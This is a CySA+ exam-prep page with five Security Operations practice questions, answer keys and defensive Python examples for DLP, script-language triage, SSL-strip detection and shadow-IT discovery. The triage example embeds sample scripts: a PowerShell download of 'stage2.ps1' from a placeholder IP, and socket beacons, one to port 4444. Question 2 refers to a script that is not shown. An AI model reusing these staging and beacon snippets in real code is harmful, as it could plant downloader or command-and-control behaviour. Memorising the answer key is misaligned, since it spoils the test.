Security Operations for CompTIA CySA+

This page covers the Security Operations domain of the CompTIA CySA+ certification. Master Cybersecurity offers 306 practice questions in this domain, drawn from the same content we use across our timed exam simulations. Below are five sample questions with full answer explanations.

Sample Practice Questions

  1. Question 1

    Which of the following tools would work best to prevent the exposure of PII outside of an organization?
    1. A. PAM
    2. B. IDS
    3. C. PKI
    4. D. DLP
    Explanation

    The correct answer is: D. DLP.

    DLP is the right tool to prevent the exposure of PII outside the organization. Data loss prevention products inspect content in motion and at rest, identify PII against organizational policies, and block or quarantine transfers that violate policy — exactly the PII-exposure prevention the question is asking about. PAM controls privileged account access. IDS detects intrusion patterns but does not stop data movement. PKI is the public-key infrastructure for encryption and signing. DLP is the data-exfiltration prevention answer.
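To make the content-inspection step concrete, here is an added example (not code from this page or from any DLP product) of the core of a DLP policy decision: it scans outbound text for SSNs and payment-card numbers, validates card candidates with the Luhn checksum so arbitrary digit runs are not flagged, and blocks the transfer only when PII is headed to a domain outside the organization. The internal domain list, the PII patterns in scope and the sample messages are constructed assumptions.

```python
from __future__ import annotations
import re

# Constructed policy: SSNs and payment card numbers (PANs) count as PII, and a
# transfer is "external" when the recipient's domain is not in this set.
INTERNAL_DOMAINS = {"corp.example", "mail.corp.example"}

# US SSN: rejects area 000/666/9xx, group 00 and serial 0000 (never issued).
SSN_RE = re.compile(r"\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# Candidate PANs: 13-19 digits, optionally separated by single spaces or dashes.
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; filters out digit runs that merely look like a card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pii(text: str) -> list[tuple[str, str]]:
    """Return (kind, redacted_value) for each PII hit; only the last 4 digits survive."""
    hits = []
    for m in SSN_RE.finditer(text):
        hits.append(("ssn", "***-**-" + m.group()[-4:]))
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append(("pan", "*" * (len(digits) - 4) + digits[-4:]))
    return hits


def inspect_transfer(text: str, recipient: str) -> dict:
    """DLP decision for one outbound message or upload.

    block          -> PII found and the recipient is outside the organization
    allow-with-log -> PII found but the transfer stays internal (recorded for audit)
    allow          -> no PII matched
    """
    hits = find_pii(text)
    domain = recipient.rsplit("@", 1)[-1].lower()
    if hits and domain not in INTERNAL_DOMAINS:
        verdict = "block"
    elif hits:
        verdict = "allow-with-log"
    else:
        verdict = "allow"
    return {"verdict": verdict, "recipient": recipient, "findings": hits}


if __name__ == "__main__":
    # Constructed sample messages: one real PAN plus an SSN going outside, a
    # random 16-digit reference that fails Luhn, and an SSN staying internal.
    for body, to in [
        ("Customer card 4111 1111 1111 1111, SSN 123-45-6789", "partner@outside.example"),
        ("Invoice reference 1234567890123456 attached", "partner@outside.example"),
        ("Payroll update for SSN 123-45-6789", "hr@corp.example"),
    ]:
        print(inspect_transfer(body, to))
```

The Luhn step is what keeps a rule like this usable in production: without it, order numbers and tracking references would trip the PAN pattern constantly and the block action would be turned off within a week. Real products add context checks (keywords such as "SSN" near the match, document fingerprints, classification labels) on the same principle.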

  2. Question 2

    A security analyst recently joined the team and is trying to determine which scripting language a production script is written in, as a first step in assessing whether it is malicious. Given the following script: Which of the following scripting languages was used in the script?
    1. A. PowerShell
    2. B. Ruby
    3. C. Python
    4. D. Shell script
    Explanation

    The correct answer is: A. PowerShell.

    The script is PowerShell, identified by its syntax. PowerShell has distinctive markers: $-prefixed variables, the Verb-Noun cmdlet naming convention (Get-Item, Invoke-WebRequest), a pipeline that passes objects rather than text, and usually the .ps1 file extension. Ruby closes blocks with the end keyword; Python opens blocks with a colon and relies on indentation; shell scripts (bash/sh) use their own built-ins and variable handling (no spaces around = in assignments, for example). The file extension is only a hint, since an attacker can rename a script freely; the syntax is what identifies the language, and the combination of these markers in the script identifies it as PowerShell.
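The syntax markers listed above can be turned into a triage helper. The following is an added example (not code from this page) of a signature-based script-language identifier: each language gets a handful of regexes with hand-chosen weights, a script is scored against all of them, and the highest score wins. The weights, the signature set and the four sample scripts are constructed assumptions, and the sample scripts use only documentation addresses.

```python
from __future__ import annotations
import re

# Constructed syntax signatures for triage (assumption: hand-chosen weights, not
# a trained classifier). Each entry is (regex, weight); a signature contributes
# weight * matches, capped at three matches so one repeated token cannot dominate.
SIGNATURES = {
    "PowerShell": [
        (re.compile(r"\$\w+\s*=\s", re.M), 1),                                  # $var = value (spaces are illegal in sh)
        (re.compile(r"\b(?:Get|Set|Invoke|New|Start|Write|Add|Remove)-[A-Z]\w+"), 3),  # Verb-Noun cmdlets
        (re.compile(r"\|\s*(?:ForEach-Object|Where-Object|Select-Object|%|\?)"), 2),      # object pipeline
        (re.compile(r"-(?:ExecutionPolicy|EncodedCommand|NoProfile)\b", re.I), 3),        # invocation flags
    ],
    "Python": [
        (re.compile(r"^\s*(?:def|class)\s+\w+.*:\s*$", re.M), 3),               # block headers end in a colon
        (re.compile(r"^\s*(?:import|from)\s+\w+", re.M), 2),
        (re.compile(r"\bprint\("), 1),
    ],
    "Ruby": [
        (re.compile(r"^\s*end\s*$", re.M), 2),                                   # blocks close with 'end'
        (re.compile(r"^\s*def\s+\w+(?:\(.*\))?\s*$", re.M), 2),                  # def without trailing colon
        (re.compile(r"\b(?:puts|require)\b"), 2),
        (re.compile(r"\.each\s+do\s*\|"), 3),
    ],
    "Shell": [
        (re.compile(r"^#!.*\b(?:ba|z|da)?sh\b", re.M), 4),                       # #!/bin/bash and friends
        (re.compile(r"^\s*(?:fi|done|esac)\s*$", re.M), 2),
        (re.compile(r"^\s*\w+=\S", re.M), 1),                                    # VAR=value, no spaces, no '$'
        (re.compile(r"\b(?:echo|grep|awk|sed|chmod|curl|wget)\b"), 1),
    ],
}


def score_script(source: str) -> dict[str, int]:
    """Score the source against every language's signature set."""
    return {
        lang: sum(w * min(len(rx.findall(source)), 3) for rx, w in sigs)
        for lang, sigs in SIGNATURES.items()
    }


def identify_script(source: str) -> str:
    """Best-scoring language, or 'unknown' when nothing matched at all."""
    scores = score_script(source)
    best = max(scores, key=scores.get)
    return best if scores[best] > 0 else "unknown"


# Constructed samples, one per candidate language in the question.
PS_SAMPLE = r'''$url = "http://203.0.113.5/stage2.ps1"
$resp = Invoke-WebRequest -Uri $url -UseBasicParsing
Get-ChildItem C:\Users | ForEach-Object { Write-Output $_.Name }
'''
SH_SAMPLE = '''#!/bin/bash
LOGDIR=/var/log
for f in "$LOGDIR"/*.log; do
  grep -ci "failed password" "$f"
done
'''
PY_SAMPLE = '''import socket

def beacon(host, port):
    s = socket.create_connection((host, port))
    s.sendall(b"ping")
'''
RB_SAMPLE = '''require 'socket'

def beacon(host)
  s = TCPSocket.new(host, 4444)
  puts s.gets
end
'''

if __name__ == "__main__":
    for name, sample in [("ps", PS_SAMPLE), ("sh", SH_SAMPLE), ("py", PY_SAMPLE), ("rb", RB_SAMPLE)]:
        print(name, identify_script(sample), score_script(sample))
```

The deliberate differentiator is the `$var = value` pattern: both PowerShell and shell use `$` to read variables, but only PowerShell allows spaces around the assignment operator, so that one regex separates the two languages cleanly while a bare `\$\w+` would not.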

  3. Question 3

    A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes accessible only through HTTP and at other times through HTTPS. Which of the following most likely describes the observed activity?
    1. A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
    2. B. An on-path attack is being performed by someone with internal access that forces users into port 80
    3. C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
    4. D. An error was caused by BGP due to new rules applied over the company's internal routers
    Explanation

    The correct answer is: B. An on-path attack is being performed by someone with internal access that forces users into port 80.

    The combination of compromised accounts and a portal that is intermittently reachable only over HTTP is the signature of an SSL-strip attack: an on-path (formerly man-in-the-middle) attacker with a foothold on the internal network intercepts the client's connection, speaks HTTPS to the server itself, and hands the user a plain-HTTP copy of the portal so that credentials are submitted in the clear. A certificate problem would produce browser warnings or failed TLS handshakes, not a silent fallback to HTTP. A web server under load does not downgrade connections from HTTPS to HTTP. A BGP error on internal routers would cause connectivity failures, not protocol downgrades. The defensive control worth knowing here is HSTS (Strict-Transport-Security): a browser that has cached the header refuses to load the portal over HTTP, which blunts SSL strip for returning users.
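An analyst who suspects this pattern can confirm it from the portal's own logs. The following is an added example (not code from this page) of that detection logic run over constructed log lines: it groups requests by client, flags any client that was served over HTTP after having used HTTPS, flags credential POSTs that travelled in the clear, and treats several affected clients as evidence of an on-path downgrade rather than one misconfigured machine. It also includes a check that the portal's response headers actually enable HSTS. The log format, the credential path and the sample addresses are assumptions.

```python
from __future__ import annotations
import re
from collections import defaultdict

# Constructed log format (assumption: a custom web-server/reverse-proxy log that
# records the request scheme): <iso-time> <client-ip> <scheme> <method> <path> <status>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<scheme>https?) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) (?P<status>\d{3})$"
)

# Paths where a plaintext POST means credentials crossed the wire unencrypted.
CREDENTIAL_PATHS = {"/portal/login"}

# Constructed sample: .17 starts on HTTPS and is later served over HTTP,
# .23 stays on HTTPS throughout, .31 only ever reaches the portal over HTTP.
SAMPLE_LOG = """\
2024-05-01T09:00:01Z 10.0.4.17 https GET /portal/ 200
2024-05-01T09:00:03Z 10.0.4.17 https POST /portal/login 302
2024-05-01T09:05:10Z 10.0.4.17 http GET /portal/ 200
2024-05-01T09:05:12Z 10.0.4.17 http POST /portal/login 302
2024-05-01T09:06:00Z 10.0.4.23 https GET /portal/ 200
2024-05-01T09:06:02Z 10.0.4.23 https POST /portal/login 302
2024-05-01T09:07:30Z 10.0.4.31 http GET /portal/ 200
2024-05-01T09:07:33Z 10.0.4.31 http POST /portal/login 302
"""


def parse_log(text: str) -> list[dict]:
    """Parse matching lines and order them by timestamp (ISO-8601 sorts lexically)."""
    events = [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]
    events.sort(key=lambda e: e["ts"])
    return events


def summarize_clients(events: list[dict]) -> dict[str, dict]:
    """Per client: scheme counts, whether HTTP followed HTTPS, and plaintext credential POSTs."""
    summary = defaultdict(lambda: {"https": 0, "http": 0, "downgraded": False,
                                   "cleartext_cred_posts": 0})
    for e in events:
        s = summary[e["client"]]
        s[e["scheme"]] += 1
        if e["scheme"] == "http":
            if s["https"] > 0:          # this client had a working HTTPS session earlier
                s["downgraded"] = True
            if e["method"] == "POST" and e["path"] in CREDENTIAL_PATHS:
                s["cleartext_cred_posts"] += 1
    return dict(summary)


def suspicious_clients(summary: dict[str, dict]) -> set[str]:
    """Clients stripped to HTTP after HTTPS, or that posted credentials in the clear."""
    return {c for c, s in summary.items() if s["downgraded"] or s["cleartext_cred_posts"] > 0}


def assess(summary: dict[str, dict]) -> str:
    """Several distinct clients flipping to HTTP on an HTTPS-only portal points to an
    on-path downgrade; a single one is more likely a local problem on that host."""
    hit = suspicious_clients(summary)
    if len(hit) >= 2:
        return "likely on-path HTTPS downgrade (SSL strip): %d clients affected" % len(hit)
    if hit:
        return "single client on HTTP: investigate that host first"
    return "no downgrade observed"


def hsts_enabled(response_headers: dict[str, str]) -> bool:
    """HSTS with a positive max-age makes a returning browser refuse plain HTTP."""
    value = next((v for k, v in response_headers.items()
                  if k.lower() == "strict-transport-security"), "")
    m = re.search(r"max-age=(\d+)", value)
    return bool(m) and int(m.group(1)) > 0


if __name__ == "__main__":
    summary = summarize_clients(parse_log(SAMPLE_LOG))
    print(sorted(suspicious_clients(summary)))
    print(assess(summary))
    print(hsts_enabled({"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}))
```

The HTTP-after-HTTPS transition is the key signal: a user who reached the portal over HTTPS minutes ago and is now being served plain HTTP for the same paths did not change their own configuration, so something between them and the server did. If the portal never sends a Strict-Transport-Security header, the `hsts_enabled` check fails and the fix is as much a server hardening item as an incident-response one.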

  4. Question 4

    The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
    1. A. Deploy a CASB and enable policy enforcement
    2. B. Configure MFA with strict access
    3. C. Deploy an API gateway
    4. D. Enable SSO to the cloud applications
    Explanation

    The correct answer is: A. Deploy a CASB and enable policy enforcement.

    Deploying a CASB and enabling policy enforcement will assist in reducing shadow IT. A cloud access security broker discovers cloud applications in use across the organization, evaluates their risk, and enforces policy on access — for example, blocking high-risk applications or applying additional controls. Configuring MFA with strict access secures authentication but does not discover or restrict shadow IT applications. Deploying an API gateway controls API traffic but does not address user-driven cloud-app adoption. Enabling SSO simplifies authentication for sanctioned applications but does not discover or block unsanctioned ones. CASB is the shadow-IT control.
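The discover-then-enforce loop a CASB runs can be sketched in a few functions. Here is an added example (not code from this page or from any CASB vendor) that aggregates constructed proxy log lines per destination, measures each cloud app's reach (distinct users) and upload volume, compares it against a sanctioned-app list and an app-risk catalog, and decides whether to allow, block, monitor or queue the app for review. The sanctioned list, the risk ratings and the log lines are assumptions standing in for a real product's discovery data and vendor risk database.

```python
from __future__ import annotations
from collections import defaultdict

# Constructed sanctioned-app list and app-risk catalog (a real CASB ships a
# vendor-maintained risk database; these values are assumptions for the example).
SANCTIONED = {"sharepoint.corp.example", "mail.corp.example", "drive.approved-vendor.example"}
RISK = {
    "freefilehost.example": "high",      # anonymous file sharing, no audit trail
    "pastebin-like.example": "high",
    "notes-saas.example": "medium",
    "drive.approved-vendor.example": "low",
}

# Constructed proxy log: <iso-time> <user> <destination-host> <bytes-uploaded>
PROXY_LOG = """\
2024-05-01T10:01:00Z alice sharepoint.corp.example 12000
2024-05-01T10:02:00Z alice freefilehost.example 8400000
2024-05-01T10:03:00Z bob freefilehost.example 2100000
2024-05-01T10:04:00Z carol notes-saas.example 3000
2024-05-01T10:05:00Z dave pastebin-like.example 52000
2024-05-01T10:06:00Z erin drive.approved-vendor.example 900000
2024-05-01T10:07:00Z frank unknown-tool.example 4100
"""


def discover_apps(log_text: str) -> dict[str, dict]:
    """Aggregate per destination: who uses it and how much data leaves toward it."""
    apps = defaultdict(lambda: {"users": set(), "bytes_out": 0})
    for line in log_text.splitlines():
        _ts, user, host, nbytes = line.split()
        apps[host]["users"].add(user)
        apps[host]["bytes_out"] += int(nbytes)
    return dict(apps)


def policy_action(host: str) -> str:
    """Sanctioned apps pass; unsanctioned ones are blocked, monitored or reviewed by risk."""
    if host in SANCTIONED:
        return "allow"
    risk = RISK.get(host)
    if risk == "high":
        return "block"
    if risk == "medium":
        return "monitor"
    return "review"          # never seen before: neither sanctioned nor rated


def shadow_it_report(log_text: str) -> list[dict]:
    """Unsanctioned apps ranked by reach (distinct users), then by bytes uploaded."""
    rows = []
    for host, stats in discover_apps(log_text).items():
        if host in SANCTIONED:
            continue
        rows.append({
            "app": host,
            "users": len(stats["users"]),
            "bytes_out": stats["bytes_out"],
            "risk": RISK.get(host, "unrated"),
            "action": policy_action(host),
        })
    rows.sort(key=lambda r: (-r["users"], -r["bytes_out"]))
    return rows


if __name__ == "__main__":
    for row in shadow_it_report(PROXY_LOG):
        print(row)
```

Ranking by distinct users before bytes is deliberate: an app one person uploads a lot to is a DLP question, while an app many people have quietly adopted is the shadow-IT problem the CISO is asking about, and the "review" bucket is where newly discovered, unrated destinations wait for a risk decision instead of being silently allowed.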

  5. Question 5

    A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access, in order to continue the attack. Which of the following best describes the stage of the Cyber Kill Chain in which the threat actor is currently operating?
    1. A. Weaponization
    2. B. Reconnaissance
    3. C. Delivery
    4. D. Exploitation
    Explanation

    The correct answer is: D. Exploitation.

    The attacker is operating in the Exploitation phase. In the Lockheed Martin Cyber Kill Chain (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objectives), Exploitation is the phase in which the attacker's technique succeeds against the target and access is gained; here the technique is social engineering rather than a software vulnerability, and the "exploit" is of human trust. Weaponization is building the payload before delivery; Reconnaissance is identifying the target; Delivery is getting the payload to the target. Strictly, the actor's wish not to lose access points toward the next phase, Installation, where persistence is established, but Installation is not among the options, so Exploitation, the phase that gained the access the actor now wants to keep, is the best available answer.
